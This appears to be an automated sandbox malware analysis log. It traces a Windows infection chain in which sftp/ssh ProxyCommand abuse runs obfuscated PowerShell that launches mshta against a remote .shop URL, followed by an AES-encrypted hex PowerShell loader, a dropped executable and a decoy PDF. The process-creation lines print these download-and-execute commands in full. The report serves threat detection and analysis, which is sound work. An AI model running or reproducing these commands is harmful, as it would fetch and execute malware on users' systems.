Source: mshta.exe, 00000006.00000003.1957853761.0000020922CB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970382739.0000020922CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4f
Source: mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4
Source: mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp480
Source: mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuh
Source: mshta.exe, 00000006.00000003.1964217583.0000020922CDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957763371.0000020922CD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970463678.0000020922CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4j
Source: mshta.exe, 00000006.00000002.1970243917.0000020922C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4l
Source: mshta.exe, 00000006.00000003.1959104077.000002112984B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1960406717.0000021129850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4lN
Source: mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4ojrdtj
Source: powershell.exe, 00000005.00000002.1376851534.000002C5AE312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1376851534.000002C5ADF71000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4p
Source: mshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4pehpv
Source: mshta.exe, 00000006.00000002.1972320693.0000021125880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4s
Source: mshta.exe, 00000006.00000002.1970743893.0000020922E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4xeDriverD
Source: mshta.exe, 00000006.00000003.1964217583.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1967165870.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1957763371.0000020922CFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1970541609.0000020922D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/a
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://storage.googleapis.com/myfilelist/list
Source: powershell.exe, 00000009.00000002.1806799060.00000222435EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1806799060.0000022244580000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.1691018560.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.1739463600.0000000005435000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.9.drString found in binary or memory: https://streams.videolan.org/upload/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.10:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.245.211.225:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.140.151:443 -> 192.168.2.10:49713 version: TLS 1.2

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 8052, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bdd.exeJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF7BFD80FB69_2_00007FF7BFD80FB6
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: Process Memory Space: powershell.exe PID: 8052, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal92.evad.winLNK@31/68@9/4
Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeMutant created: NULL
Source: C:\Users\user\AppData\Roaming\bdd.exeMutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$2254
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zh0ul3by.u5m.ps1Jump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\OpenSSH\sftp.exe "C:\Windows\System32\OpenSSH\sftp.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" .
Source: C:\Windows\System32\OpenSSH\sftp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\sftp.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/BUX6P.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1632,i,3400074222581117938,16656895389313698279,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\bdd.exe "C:\Users\user\AppData\Roaming\bdd.exe"
Source: C:\Windows\System32\OpenSSH\sftp.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftpJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/BUX6P.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\bdd.exe "C:\Users\user\AppData\Roaming\bdd.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1632,i,3400074222581117938,16656895389313698279,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exeSection loaded: libcrypto.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\sftp.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
